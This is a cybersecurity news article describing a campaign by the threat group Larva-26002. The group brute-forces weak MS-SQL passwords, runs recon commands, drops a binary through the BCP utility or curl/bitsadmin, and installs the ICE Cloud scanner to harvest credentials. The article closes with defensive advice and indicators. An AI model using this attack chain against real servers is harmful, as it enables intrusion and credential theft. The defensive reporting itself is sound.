Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Critical FatFs Vulnerabilities Expose Millions of Embedded Devices
July 4, 2026
Critical Linux Kernel Vulnerability CVE-2023-0179 Grants Root Access
July 4, 2026
Home/Threats/Threat Actors Exploit MS-SQL Servers to Deploy ICE Cloud Scanner
Threats

Threat Actors Exploit MS-SQL Servers to Deploy ICE Cloud Scanner

Key Takeaways The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers. The attackers are deploying a new Go-based scanner malware called ICE Cloud Client. The...

Emy Elsamnoudy
Emy Elsamnoudy
March 24, 2026 4 Min Read
48 0

Key Takeaways

  • The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers.
  • The attackers are deploying a new Go-based scanner malware called ICE Cloud Client.
  • The campaign, ongoing since January 2024, has shifted from ransomware to large-scale reconnaissance and credential harvesting.
  • Poor password hygiene on internet-facing MS-SQL servers is the primary initial compromise vector.
  • The campaign’s long-term nature and reconnaissance focus suggest preparation for future, larger-scale attacks.

Persistent Threat Actor Larva-26002 Leverages New ICE Cloud Scanner Against MS-SQL Servers

A sophisticated threat actor, identified as Larva-26002, is relentlessly exploiting vulnerable Microsoft SQL (MS-SQL) servers, deploying a novel scanner malware dubbed ICE Cloud Client. This ongoing campaign, which originated in January 2024, demonstrates a strategic evolution from direct ransomware deployment to extensive reconnaissance of database infrastructure.

Table Of Content

  • Key Takeaways
  • Persistent Threat Actor Larva-26002 Leverages New ICE Cloud Scanner Against MS-SQL Servers
  • Evolution of the Campaign
  • ICE Cloud Scanner: The Infection Mechanism
  • What You Should Do

Evolution of the Campaign

Larva-26002’s activities initially came to light in January 2024, when the group focused on compromising internet-exposed MS-SQL servers secured with weak credentials. These early attacks involved the deployment of Trigona and Mimic ransomware. The attackers skillfully utilized the legitimate MS-SQL Bulk Copy Program (BCP) utility to exfiltrate data and drop malicious payloads onto compromised systems. Remote access tools such as AnyDesk and various port forwarders for RDP connections were also installed to maintain persistence.

By 2025, the group had refined its toolkit, incorporating Teramind, a remote monitoring and management (RMM) solution, and transitioning to a Rust-based scanner for its operations. This continuous adaptation of tools and tactics underscores the threat actor’s persistent efforts to enhance their capabilities.

Analysts at ASEC observed a renewed surge of attacks in 2026, targeting many of the same MS-SQL servers previously compromised. In this latest phase, Larva-26002 introduced ICE Cloud, a scanner malware developed in the Go programming language, marking a distinct shift from the Rust-based scanner observed in 2025. The presence of Turkish binary strings within ICE Cloud further reinforces its connection to the Mimic ransomware attacks of 2024, indicating a consistent operational footprint.

The strategic pivot from ransomware to widespread scanning is a significant concern. By establishing a growing network of compromised servers that surreptitiously probe other databases for weak credentials, Larva-26002 appears to be meticulously preparing for more substantial future operations. The intelligence gathered from these scanning activities is transmitted to the attacker’s command-and-control (C&C) server, providing a comprehensive overview of vulnerable database assets across the internet.

ICE Cloud Scanner: The Infection Mechanism

The attack sequence begins with Larva-26002 identifying an MS-SQL server accessible from the internet and protected by weak or easily guessable passwords. Initial access is typically gained through brute-force or dictionary attacks.

Upon successful compromise, the attacker executes standard system commands such as hostname, whoami, and netstat -an to gather information about the target host. Malware deployment frequently leverages the BCP utility, which is exploited to export a malicious binary from a database table named uGnzBdZbsi to a local path as api.exe. This process is orchestrated via a formatting file named FODsOZKgAU.txt, a method that has remained consistent since 2024.

In scenarios where the BCP utility fails to execute, the malware is retrieved using alternative methods, including Curl or Bitsadmin via PowerShell commands.

The api.exe file, identified as the ICE Cloud Launcher, establishes communication with a C&C server for authentication. Following successful authentication, it proceeds to download the core component: the ICE Cloud Client scanner. This client is saved with a random filename to evade detection and mask its malicious nature. After installation, the ICE Cloud Client registers itself with the C&C server, which then dispatches a list of target MS-SQL addresses, along with specific credential pairs (e.g., ecomm/ecomm) and a task string, typically TASK.

The scanner attempts to authenticate against the provided MS-SQL targets using the supplied credentials. Any successful logins are reported back to the C&C server. Notably, the internal binary strings of the ICE Cloud Client are written in Turkish and incorporate emoji characters, potentially suggesting the use of generative AI tools in its development.

What You Should Do

  • Implement strong, unique, and complex passwords for all MS-SQL accounts. Enforce regular password rotation policies.
  • Ensure all internet-facing MS-SQL servers are protected by a robust firewall, restricting access to only authorized IP addresses and necessary ports.
  • Maintain up-to-date endpoint security software across all systems to detect and prevent known malware execution.
  • Monitor for unusual activity related to the BCP utility, unexpected file creations (e.g., api.exe in C:ProgramData), or unauthorized outbound network connections, and investigate any suspicious indicators promptly.
  • Regularly audit MS-SQL server configurations for security best practices and apply all available security patches and updates.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwarePatchransomwareSecurityThreat

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

New PureHVNC Malware Campaign Uses Google Forms to Lure Victims

Next Post

Tycoon2FA Phishing Campaign Targets Cloud Accounts After Brief Hiatus

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us